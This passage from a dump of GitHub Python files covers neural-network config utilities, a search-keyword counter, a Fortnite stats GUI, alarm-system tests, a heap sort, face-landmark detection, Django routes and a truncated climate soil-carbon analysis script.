= int(input_dims[2])\n else:\n prev_map_number = conv_layer_configs[-1]['output_shape'][1]\n prev_feat_dim_x = conv_layer_configs[-1]['output_shape'][2]\n prev_feat_dim_y = conv_layer_configs[-1]['output_shape'][3]\n\n current_map_number = int(elements[0])\n filter_xy = elements[1].split('x')\n filter_size_x = int(filter_xy[0])\n filter_size_y = int(filter_xy[1])\n pool_xy = elements[2].replace('p','').replace('P','').split('x')\n pool_size_x = int(pool_xy[0])\n pool_size_y = int(pool_xy[1])\n output_dim_x = (prev_feat_dim_x - filter_size_x + 1) / pool_size_x\n output_dim_y = (prev_feat_dim_y - filter_size_y + 1) / pool_size_y\n\n config['input_shape'] = (batch_size, prev_map_number, prev_feat_dim_x, prev_feat_dim_y)\n config['filter_shape'] = (current_map_number, prev_map_number, filter_size_x, filter_size_y)\n config['poolsize'] = (pool_size_x, pool_size_y)\n config['output_shape'] = (batch_size, current_map_number, output_dim_x, output_dim_y)\n if len(elements) == 4 and elements[3] == 'f':\n config['flatten'] = True\n else:\n config['flatten'] = False\n\n conv_layer_configs.append(config)\n return conv_layer_configs\n\ndef _relu(x):\n return x * (x > 0)\n\ndef _capped_relu(x):\n return T.minimum(x * (x > 0), 6)\n\ndef _linear(x):\n return x * 1.0\n\ndef parse_activation(act_str):\n print(\"***\", act_str)\n if act_str == 'sigmoid':\n return T.nnet.sigmoid\n elif act_str == 'tanh':\n return T.tanh\n elif act_str == 'relu':\n return _relu\n elif act_str == 'capped_relu':\n return _capped_relu\n elif act_str == 'linear':\n return _linear\n return T.nnet.sigmoid\n\ndef activation_to_txt(act_func):\n if act_func == T.nnet.sigmoid:\n return 'sigmoid'\n if act_func == T.tanh:\n return 'tanh'\n\ndef parse_two_integers(argument_str):\n elements = argument_str.split(\":\")\n int_strs = elements[1].split(\",\")\n return int(int_strs[0]), int(int_strs[1])\n\n\"\"\"\nUsage:\n command = 'mysqladmin create test -uroot -pmysqladmin12'\n for line in run_command(command):\n print(line)\n\"\"\"\ndef run_command(command):\n fnull = open(os.devnull, 'w')\n p = subprocess.Popen(command,\n stdout=subprocess.PIPE,\n stderr=fnull,\n shell=True)\n return p, iter(p.stdout.readline, b'')\n\ndef pickle_load(filename):\n f = open(filename, \"rb\")\n try:\n obj = pickle.load(f)\n except Exception:\n f.close()\n f = open(filename, \"rb\")\n print(\"Not a pickled file... try to load as text format: \" + filename)\n obj = json.load(f)\n f.close()\n return obj\n\ndef pickle_save(obj, filename):\n f = open(filename + \".new\", \"wb\")\n pickle.dump(obj, f)\n f.close()\n os.rename(filename + \".new\", filename)\n\ndef makedirs(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\ndef kahan_add(total, carry, inc):\n cs = T.add_no_assoc(carry, inc)\n s = T.add_no_assoc(total, cs)\n update_carry = T.sub(cs, T.sub(s, total))\n update_total = s\n return update_total, update_carry\n","repo_name":"hpi-xnor/BMXNet","sub_path":"example/speech-demo/io_func/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"71778942187","text":"# create global variable\nglobal keyword_dict\nglobal top_20_list\nglobal keyword_order\n\n\"\"\"\n# keyword_dict: record all keyword with count number\n# top_20_list: record top 20 searched keyword since launched\n# keyword_order: record all keywords in first appearance order,\n# this_keyword_order: record keyword in first appearance order, reset every time new phrase is searched\n# this_keyword_dict: record this keywords with count number\n\"\"\"\nkeyword_dict = {}\ntop_20_list = []\nkeyword_order = []\nthis_keyword_order = []\nthis_keyword_dict = {}\n\n\ndef handle_input(search_string):\n # store search result into result history\n parse_search_input(search_string)\n # acquire top 20 count in searched order\n top_20_keyword()\n # sort top 20 in order of count\n insertion_sort()\n # reverse top 20 keyword\n top_20_list.reverse()\n\n\ndef parse_search_input(search_string):\n # reset for new input\n this_keyword_order[:] = []\n this_keyword_dict.clear()\n\n # convert input string into lowercase letter\n # break the string into list of word and record to total_keywords\n search_string = search_string.lower()\n search_keywords = search_string.split()\n\n # find number of times each keyword being searched\n for word in search_keywords:\n # this search's keyword\n if word not in this_keyword_dict:\n # add word and initial (1) count into dictonary of all searched keys since launched\n this_keyword_dict[word] = 1\n # add word into order list to record search order\n # total keyword\n if word not in this_keyword_order:\n this_keyword_order.append(word)\n else:\n # increment the count of the searched keyword\n this_keyword_dict[word] += 1\n\n # all\n if word not in keyword_dict:\n # add word and initial (1) count into dictionary of all searched keys since launched\n keyword_dict[word] = 1\n # add word into order list to record search order\n # total keyword\n if word not in keyword_order:\n keyword_order.append(word)\n else:\n # increment the count of the searched keyword\n keyword_dict[word] += 1\n\n\ndef insertion_sort():\n for i in range(1, len(top_20_list)):\n cur_word = top_20_list[i]\n pos = i\n while pos > 0 and keyword_dict[top_20_list[pos - 1]] > keyword_dict[top_20_list[i]]:\n top_20_list[pos] = top_20_list[pos - 1]\n pos = pos - 1\n top_20_list[pos] = cur_word\n\n\n# compute top 20 count keywords\ndef top_20_keyword():\n # delete old result\n top_20_list[:] = []\n # loop through all keyword since launched\n for word in keyword_order:\n if len(top_20_list) < 20:\n # add keyword to top20list if the list is not full (contain 20 elements) despite the frequency count\n top_20_list.append(word)\n else:\n # find the minimum frequency count in the current top20list\n min_top20 = top_20_list[0]\n for word_top20 in top_20_list:\n # if word_top20 count is lesser than the current min count then update min\n if keyword_dict[word_top20] < keyword_dict[min_top20]:\n min_top20 = word_top20\n # compare min count keyword in top 20 list and the current word in all search\n # remove min count keyword if current word is greater and replace with new keyword\n if keyword_dict[min_top20] < keyword_dict[word]:\n top_20_list.remove(min_top20)\n top_20_list.append(word)\n","repo_name":"moGrans/Team-noob-Web-Project","sub_path":"old code/keyword_history.py","file_name":"keyword_history.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31295907361","text":"from torchtext import data\n\nfrom fastai.nlp import *\n\n\n\nPATH = 'data/aclImdb/'\n\n\n\nTRN_PATH = 'train/all/'\n\nVAL_PATH = 'test/all/'\n\nTRN = f'{PATH}{TRN_PATH}'\n\nVAL = f'{PATH}{VAL_PATH}'\n\n\n\nTEXT = data.Field(lower=True, tokenize=\"spacy\")\n\n\n\nbs = 64;\n\nbptt = 70\n\n\n\nFILES = dict(train=TRN_PATH, validation=VAL_PATH, test=VAL_PATH)\n\nmd = LanguageModelData.from_text_files(PATH, TEXT, **FILES, bs=bs, bptt=bptt, min_freq=10)\n\n\n\nwith open(\"md.pkl\", \"wb\") as file:\n\n pickle.dump(md, file)\n","repo_name":"dycforever/program","sub_path":"pytorch/sentiment/t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38453166219","text":"import tkinter\nfrom tkinter import messagebox\nfrom PIL import ImageTk, Image\nimport configparser\nimport requests\nimport webbrowser\n\n\n# Load configuration file with API keys\nConfig = configparser.ConfigParser()\nConfig.read('tokens.ini')\n# Tracker Network\nTRN_key = Config.get('Tokens', 'trn-api-key')\nHEADERS = {'TRN-Api-Key': TRN_key}\n\n\nclass MainWindow(tkinter.Tk):\n def __init__(self):\n super().__init__()\n self.player_stats = {}\n # Window settings\n self.title(\"Fortnite Stats\")\n self.geometry('515x380')\n self.resizable(False, False)\n # Title Appearance Options\n TITLE_COLOR = 'MediumPurple3'\n TITLE_TEXT_COLOR = 'Black'\n # Stat Appearance Options\n STAT_BG_COLOR ='DodgerBlue2'\n STAT_FG_COLOR = 'white'\n STAT_CATAGORY_FONT = 'Arial 12 bold'\n STAT_VALUE_FONT = 'Arial 12'\n\n # Title Bar Frame\n title_bar_frame = tkinter.Frame(self)\n title_bar_frame.pack(fill='x')\n title_bar_frame.configure(background=TITLE_COLOR)\n # Logo\n self.logo = ImageTk.PhotoImage(Image.open('fortnite-logo.png'))\n\n tkinter.Label(title_bar_frame, image=self.logo, bg=TITLE_COLOR).grid(row=0, column=0, rowspan=2)\n program_title = tkinter.Label(title_bar_frame, text='FORTNITE Stat Tracker', bg=TITLE_COLOR, fg=TITLE_TEXT_COLOR)\n program_title.grid(row=0, column=1)\n program_title.configure(font='Arial 26 bold underline')\n\n #API Credits\n api_credits = tkinter.Label(title_bar_frame, text='Powered By: Fortnitetracker.com', bg=TITLE_COLOR, fg=TITLE_TEXT_COLOR)\n api_credits.grid(row=1, column=1)\n api_credits.configure(font='Arial 18 bold')\n api_credits.bind(\"\", self.tracker_page)\n\n # Lifetime Stat frame\n stat_frame = tkinter.Frame(self)\n stat_frame.pack(fill='x')\n stat_frame.configure(bg=STAT_BG_COLOR)\n stat_frame.columnconfigure(2, weight=1)\n\n # Check Boxes\n tkinter.Checkbutton(stat_frame, text='Solo', command=self.solo_player_stats, activebackground=STAT_BG_COLOR, activeforeground=STAT_FG_COLOR, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR, font=STAT_CATAGORY_FONT).grid(row=0, column=3)\n tkinter.Checkbutton(stat_frame, text='Duo', command=self.duo_player_stats, activebackground=STAT_BG_COLOR, activeforeground=STAT_FG_COLOR, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR, font=STAT_CATAGORY_FONT).grid(row=0, column=4)\n tkinter.Checkbutton(stat_frame, text='Squad', command=self.squad_player_stats, activebackground=STAT_BG_COLOR, activeforeground=STAT_FG_COLOR, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR, font=STAT_CATAGORY_FONT).grid(row=0, column=5, sticky='w')\n\n # Account label\n self.account_name = tkinter.StringVar()\n tkinter.Label(stat_frame, text='Account:', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=0, column=0, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.account_name, font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=0, column=1, sticky='w')\n\n # Platform label\n self.platform = tkinter.StringVar()\n self.platform.set('PC')\n tkinter.Label(stat_frame, text='Platform:', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=1, column=0, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.platform, font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=1, column=1, sticky='w')\n\n # Entry Box\n self.user = tkinter.StringVar()\n self.search_button = tkinter.Button(stat_frame, text='Search')\n self.search_button.grid(row=1, column=3, sticky='we')\n self.search_button.bind('', self.solo_player_stats)\n\n self.entry = tkinter.Entry(stat_frame, textvariable=self.user)\n self.entry.insert(0, 'Enter Username')\n self.entry.grid(row=1, column=4, sticky='w')\n\n #######################\n # Lifetime Stats #\n #######################\n # Lifetime title label\n tkinter.Label(stat_frame, text='==Lifetime Stats==', font=('Arial', 14, 'bold'), bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=2, column=1, columnspan=3, sticky='ew')\n\n # Win label\n self.wins = tkinter.StringVar()\n tkinter.Label(stat_frame, text='Wins: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=0, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.wins, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=1, sticky='w')\n\n # Matches Played Label\n self.matches_played = tkinter.StringVar()\n tkinter.Label(stat_frame, text='Matches Played: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=4, column=0, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.matches_played, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=4, column=1, sticky='w')\n\n # Win Percentage Label\n self.win_per = tkinter.StringVar()\n tkinter.Label(stat_frame, text='Win Percentage: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=5, column=0, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.win_per, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=5, column=1, sticky='w')\n\n # Kills Label\n self.kills = tkinter.StringVar()\n tkinter.Label(stat_frame, text='Kills: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=4, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.kills, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=5, sticky='w')\n\n # Kill/Death Ratio Label\n self.kdr = tkinter.StringVar()\n tkinter.Label(stat_frame, text='KDR: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=4, column=4, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.kdr, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=4, column=5, sticky='w')\n\n # Score Per Match Label\n self.spm = tkinter.StringVar()\n tkinter.Label(stat_frame, text='Avg. Score:', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=5, column=4, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.spm, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=5, column=5, sticky='w')\n #######################\n # Seasonal Stats #\n #######################\n # Season Stat frame\n season_stat_frame = tkinter.Frame(self)\n season_stat_frame.pack(fill='x')\n season_stat_frame.configure(bg=STAT_BG_COLOR)\n\n # Season Title label\n tkinter.Label(season_stat_frame, text='==Seasonal Stats==', font=('Arial', 14, 'bold'), bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=0, column=1, columnspan=3, sticky='ew')\n\n # Win label\n self.season_wins = tkinter.StringVar()\n tkinter.Label(season_stat_frame, text='Wins: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=1, column=0, sticky='e')\n tkinter.Label(season_stat_frame, textvariable=self.season_wins, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=1, column=1, sticky='w')\n\n # Matches Played Label\n self.season_matches_played = tkinter.StringVar()\n tkinter.Label(season_stat_frame, text='Matches Played: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=2, column=0, sticky='e')\n tkinter.Label(season_stat_frame, textvariable=self.season_matches_played, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=2, column=1, sticky='w')\n\n # Win Percentage Label\n self.season_win_per = tkinter.StringVar()\n tkinter.Label(season_stat_frame, text='Win Percentage: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=0, sticky='e')\n tkinter.Label(season_stat_frame, textvariable=self.season_win_per, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=1, sticky='w')\n\n # Kills Label\n self.season_kills = tkinter.StringVar()\n tkinter.Label(season_stat_frame, text='Kills: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=1, column=4, sticky='e')\n tkinter.Label(season_stat_frame, textvariable=self.season_kills, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=1, column=5, sticky='w')\n\n # Kill/Death Ration Label\n self.season_kdr = tkinter.StringVar()\n tkinter.Label(season_stat_frame, text='KDR: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=2, column=4, sticky='e')\n tkinter.Label(season_stat_frame, textvariable=self.season_kdr, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=2, column=5, sticky='w')\n\n # Avg score per match\n self.season_spm = tkinter.StringVar()\n tkinter.Label(season_stat_frame, text='Avg. Score:', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=4, sticky='e')\n tkinter.Label(season_stat_frame, textvariable=self.season_spm, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=5, sticky='w')\n\n # clickable link to Fortnite website\n fortnite_link = tkinter.Label(self, text='Play FORTNITE For Free!', font='Impact 10')\n fortnite_link.pack(side='right')\n fortnite_link.bind('', self.game_page)\n\n self.update()\n\n def solo_player_stats(self, *event):\n \"\"\"Grab lifetime/seasonal solo stats\"\"\"\n player_data = self.grab_player_profile()\n if player_data:\n # Lifetime stats\n solo_stats = player_data['stats']['p2']\n self.account_name.set(player_data['epicUserHandle'])\n self.platform.set(player_data['platformNameLong'])\n self.matches_played.set(solo_stats['matches']['value'])\n self.wins.set(solo_stats['top1']['value'])\n self.win_per.set(\"%.2f\" % ((solo_stats['top1']['valueInt'] / solo_stats['matches']['valueInt']) * 100) + \"%\")\n self.kills.set(solo_stats['kills']['value'])\n self.kdr.set(solo_stats['kd']['value'] + \"%\")\n self.spm.set(solo_stats['scorePerMatch']['value'])\n # Seasonal Stats\n season_solo_stats = player_data['stats']['curr_p2']\n self.season_matches_played.set(season_solo_stats['matches']['value'])\n self.season_wins.set(season_solo_stats['top1']['value'])\n self.season_win_per.set(\"%.2f\" % ((season_solo_stats['top1']['valueInt'] / season_solo_stats['matches']['valueInt']) * 100) + \"%\")\n self.season_kills.set(season_solo_stats['kills']['value'])\n self.season_kdr.set(season_solo_stats['kd']['value'] + \"%\")\n self.season_spm.set(season_solo_stats['scorePerMatch']['value'])\n\n def duo_player_stats(self):\n \"\"\"Grab lifetime/seasonal duo stats\"\"\"\n player_data = self.grab_player_profile()\n # Lifetime stats\n if player_data:\n duo_stats = player_data['stats']['p10']\n self.account_name.set(player_data['epicUserHandle'])\n self.platform.set(player_data['platformNameLong'])\n self.matches_played.set(duo_stats['matches']['value'])\n self.wins.set(duo_stats['top1']['value'])\n self.win_per.set(\"%.2f\" % ((duo_stats['top1']['valueInt'] / duo_stats['matches']['valueInt']) * 100) + \"%\")\n self.kills.set(duo_stats['kills']['value'])\n self.kdr.set(duo_stats['kd']['value'] + \"%\")\n self.spm.set(duo_stats['scorePerMatch']['value'])\n # Seasonal Stats\n season_duo_stats = player_data['stats']['curr_p10']\n self.season_matches_played.set(season_duo_stats['matches']['value'])\n self.season_wins.set(season_duo_stats['top1']['value'])\n self.season_win_per.set(\"%.2f\" % ((season_duo_stats['top1']['valueInt'] / season_duo_stats['matches']['valueInt']) * 100) + \"%\")\n self.season_kills.set(season_duo_stats['kills']['value'])\n self.season_kdr.set(season_duo_stats['kd']['value'] + \"%\")\n self.season_spm.set(season_duo_stats['scorePerMatch']['value'])\n\n def squad_player_stats(self):\n \"\"\"Grab lifetime/seasonal squad stats\"\"\"\n player_data = self.grab_player_profile()\n if player_data:\n # Lifetime stats\n squad_stats = player_data['stats']['p9']\n self.account_name.set(player_data['epicUserHandle'])\n self.platform.set(player_data['platformNameLong'])\n self.matches_played.set(squad_stats['matches']['value'])\n self.wins.set(squad_stats['top1']['value'])\n self.win_per.set(\"%.2f\" % ((squad_stats['top1']['valueInt'] / squad_stats['matches']['valueInt']) * 100) + \"%\")\n self.kills.set(squad_stats['kills']['value'])\n self.kdr.set(squad_stats['kd']['value'] + \"%\")\n self.spm.set(squad_stats['scorePerMatch']['value'])\n # Seasonal Stats\n season_squad_stats = player_data['stats']['curr_p9']\n self.season_matches_played.set(season_squad_stats['matches']['value'])\n self.season_wins.set(season_squad_stats['top1']['value'])\n self.season_win_per.set(\"%.2f\" % ((season_squad_stats['top1']['valueInt'] / season_squad_stats['matches']['valueInt']) * 100) + \"%\")\n self.season_kills.set(season_squad_stats['kills']['value'])\n self.season_kdr.set(season_squad_stats['kd']['value'] + \"%\")\n self.season_spm.set(season_squad_stats['scorePerMatch']['value'])\n\n def grab_player_profile(self):\n user = self.user.get()\n platform = 'pc'\n r = requests.get('https://api.fortnitetracker.com/v1/profile/{}/{}'.format(platform, user), headers=HEADERS)\n player_data = r.json()\n if len(player_data) == 1:\n messagebox.showerror(\"ERROR!\", 'Username not found.')\n return 0\n return player_data\n\n def tracker_page(self, event):\n webbrowser.open_new(r\"https://fortnitetracker.com/\")\n\n def game_page(self, event):\n webbrowser.open_new(r\"https://www.epicgames.com/fortnite/en-US/home\")\n\n\nif __name__ == '__main__':\n win = MainWindow()\n win.mainloop()\n\n\n\n","repo_name":"Ryoliveira/FortniteStatGUI","sub_path":"FortniteGUI.py","file_name":"FortniteGUI.py","file_ext":"py","file_size_in_byte":14448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33950216600","text":"from pyspcwebgw import Area\nfrom pyspcwebgw.const import AreaMode\n\nAREA_DEF_1 = {\n \"id\": \"1\",\n \"name\": \"House\",\n \"mode\": \"3\",\n \"last_set_time\": \"1485759851\",\n \"last_set_user_id\": \"1\",\n \"last_set_user_name\": \"Pelle\",\n \"last_unset_time\": \"1485800564\",\n \"last_unset_user_id\": \"1\",\n \"last_unset_user_name\": \"Lisa\",\n \"last_alarm\": \"1478174896\",\n}\n\nAREA_DEF_2 = {\n \"id\": \"3\",\n \"name\": \"Garage\",\n \"mode\": \"0\",\n \"last_set_time\": \"1483705803\",\n \"last_set_user_id\": \"9998\",\n \"last_set_user_name\": \"Pelle\",\n \"last_unset_time\": \"1483705808\",\n \"last_unset_user_id\": \"9998\",\n \"last_unset_user_name\": \"Lisa\",\n}\n\n\ndef test_parse_details():\n area = Area(gateway=None, spc_area=AREA_DEF_1)\n assert area.name == \"House\"\n assert area.mode == AreaMode.FULL_SET\n\n area = Area(gateway=None, spc_area=AREA_DEF_2)\n assert area.name == \"Garage\"\n assert area.mode == AreaMode.UNSET\n\n\ndef test_last_changed_by_depends_on_mode():\n area = Area(gateway=None, spc_area=AREA_DEF_1)\n assert area.last_changed_by == \"Pelle\"\n\n area = Area(gateway=None, spc_area=AREA_DEF_2)\n assert area.last_changed_by == \"Lisa\"\n","repo_name":"pyspcwebgw/pyspcwebgw","sub_path":"tests/test_area.py","file_name":"test_area.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"33140884211","text":"import numpy as np\nimport time\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom pylab import *\n\nplt.close('all')\n\ndef heapSort( aList ):\n # convert aList to heap\n length = len( aList ) - 1\n leastParent = int(length / 2)\n for i in range ( leastParent, -1, -1 ):\n moveDown( aList, i, length )\n \n # flatten heap into sorted array\n for i in range ( length, 0, -1 ):\n if aList[0] > aList[i]:\n swap( aList, 0, i )\n moveDown( aList, 0, i - 1 )\n \n \ndef moveDown( aList, first, last ):\n largest = 2 * first + 1\n while largest <= last:\n # right child exists and is larger than left child\n if ( largest < last ) and ( aList[largest] < aList[largest + 1] ):\n largest += 1\n \n # right child is larger than parent\n if aList[largest] > aList[first]:\n swap( aList, largest, first )\n # move down to largest child\n first = largest;\n largest = 2 * first + 1\n else:\n return # force exit\n \n \ndef swap( A, x, y ):\n tmp = A[x]\n A[x] = A[y]\n A[y] = tmp\n\n# Driver code to test above \narraySize = 10\n\n#arr = np.random.randint(low=1, high=100, size= arraySize).tolist()\narr = [ 12, 11, 13, 5, 6, 7] \nheapSort(arr) \nn = len(arr) \nprint (\"Sorted array is\", arr) \n\n\n#for i in range(n): \n#\tprint (\"%d\" %arr[i]), \n","repo_name":"MariamChowdhury/Python-Codes","sub_path":"heapSort.py","file_name":"heapSort.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18715756678","text":"import face_alignment\nimport matplotlib.pyplot as plt\nfrom skimage import io\nimport numpy as np\nimport argparse\n\n\ndef run(img_path, txt_path, vis):\n fa = face_alignment.FaceAlignment(face_alignment.LandmarksType._2D, device='cpu', face_detector='sfd')\n image = io.imread(img_path)\n det = fa.get_landmarks_from_image(image)\n\n np.savetxt(txt_path, det[0] ,fmt='%.4f')\n\n if vis:\n plt.imshow(image)\n for detection in det:\n plt.scatter(detection[:,0], detection[:,1], 2)\n print('Landmarks saved in ' + txt_path)\n\nif __name__ == \"__main__\":\n # Training settings\n parser = argparse.ArgumentParser(description='2D Landmarks Detection')\n parser.add_argument('--image_path', type=str, help='Path to image')\n parser.add_argument('--txt_path', type=str, help='Path to saved txt')\n parser.add_argument('--vis', type=bool, default=False, help='Visualize landmarks on image')\n args = parser.parse_args()\n\n run(args.image_path, args.txt_path, args.vis)","repo_name":"anantarb/FRDI","sub_path":"detect_landmarks.py","file_name":"detect_landmarks.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39663335348","text":"from django.conf.urls import url, include\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom .views import ActivityDownloadcsv,ActivityDateView,SortedActivity,SortedMasterPlan\n\nurlpatterns = {\n url(r'^activity/', ActivityDownloadcsv.as_view()),\n url(r'^activitydates/(?P.*)$', ActivityDateView.as_view()),\n url(r'^sortedactivity/', SortedActivity.as_view()),\n url(r'^sortedmasterplan/', SortedMasterPlan.as_view()),\n}\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n","repo_name":"KrishnaSindhur/construction-app","sub_path":"src/construction_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17509697704","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on May 2022\n@author: Rebecca Varney, University of Exeter (r.varney@exeter.ac.uk)\n\n\"\nScript quantifies and saves dCs and the breakdown values (dCs,npp / dCs,tau / dnppdtau, dCs,nep / dCs,tau_nep / dnepdtau)\nfor the C4MIP simulations for 2xCO2 and 4xCO2.\n\"\n\n\"\"\"\n\n#%%\n\n# Analysis imports\nimport numpy as np\nimport iris\nimport iris.coord_categorisation\nimport glob\nimport warnings\nfrom iris.experimental.equalise_cubes import equalise_attributes\n\n# My functions\nfrom rmv_cmip_analysis import combine_netCDF_cmip6, combine_netCDF_model, open_netCDF\nfrom rmv_cmip_analysis import annual_average, global_total_percentage\n\n\n#%%\n\n# C4MIP simulations\nC4MIP_simulation = ['1pctCO2', '1pctCO2-bgc', '1pctCO2-rad']\nC4MIP_labels = ['1pctCO2', '1pctCO2_bgc', '1pctCO2_rad']\n\n# CMIP6 models\ncmip6_models = ['ACCESS-ESM1-5', 'BCC-CSM2-MR', 'CanESM5', 'CESM2', 'GFDL-ESM4', 'IPSL-CM6A-LR', 'MIROC-ES2L', 'MPI-ESM1-2-LR', 'NorESM2-LM', 'UKESM1-0-LL']\nmodel_colors = ['peachpuff', '#fb8072', '#80b1d3', 'dodgerblue', 'darkcyan', 'darkgreen', 'olive', 'gold', 'orange', 'darkseagreen']\nn_models = len(cmip6_models)\n\n# 2xCO2 (65:70)\n# 4xCO2 (135:140)\n\n\n# Loop through each C4MIP simulation\nfor c4mip_option in range(0, len(C4MIP_simulation)):\n #\n c4mip = C4MIP_simulation[c4mip_option]\n C4MIP_label = C4MIP_labels[c4mip_option]\n \n \n # Empty arrays\n cmip6_deltaCs = np.zeros((len(cmip6_models)))\n cmip6_deltaCstau = np.zeros((len(cmip6_models)))\n cmip6_deltaCsNPP = np.zeros((len(cmip6_models)))\n cmip6_deltadelta = np.zeros((len(cmip6_models)))\n cmip6_NEPtau = np.zeros((len(cmip6_models)))\n cmip6_deltaNEPdeltatau = np.zeros((len(cmip6_models)))\n cmip6_NEPdeltatau = np.zeros((len(cmip6_models)))\n #\n# cmip6_deltaCs_fractional = np.zeros((len(cmip6_models)))\n# cmip6_deltaCstau_fractional = np.zeros((len(cmip6_models)))\n# cmip6_deltaCsNPP_fractional = np.zeros((len(cmip6_models)))\n# cmip6_deltadelta_fractional = np.zeros((len(cmip6_models)))\n# cmip6_NEPtau_fractional = np.zeros((len(cmip6_models)))\n# cmip6_deltaNEPdeltatau_fractional = np.zeros((len(cmip6_models)))\n# cmip6_NEPdeltatau_fractional = np.zeros((len(cmip6_models)))\n\n\n # for loop for each CMIP6 model\n for model_i in range(0, n_models):\n model = cmip6_models[model_i]\n print(model, c4mip)\n \n # land fraction\n landfraction = combine_netCDF_model('/home/rmv203/DATA/cmip6_data/sftlf_fx_'+model+'_historical*', model)\n \n # Soil Carbon (cSoil)\n cSoil_cube = combine_netCDF_cmip6('/home/rmv203/DATA/CMIP_'+c4mip+'/cSoil_Emon_'+model+'_'+c4mip+'*', model)\n cSoil_cube = open_netCDF(cSoil_cube)\n cSoil_cube = annual_average(cSoil_cube)\n cSoil_cube = global_total_percentage(cSoil_cube, landfrac=landfraction, latlon_cons=None)\n cSoil_data = cSoil_cube.data\n \n # time dimension\n if model == 'ACCESS-ESM1-5':\n time_dimension = cSoil_cube.coord('year').points\n \n # Litter Carbon (cLitter)\n if model=='ACCESS-ESM1-5' or model=='BCC-CSM2-MR' or model=='CanESM5' or model=='CESM2' or model=='CNRM-ESM2-1' or model=='IPSL-CM6A-LR' or model=='MIROC-ES2L' or model=='MPI-ESM1-2-LR' or model=='NorESM2-LM' or model=='GFDL-ESM4':\n cLitter_cube = combine_netCDF_cmip6('/home/rmv203/DATA/CMIP_'+c4mip+'/cLitter_Lmon_'+model+'_'+c4mip+'*', 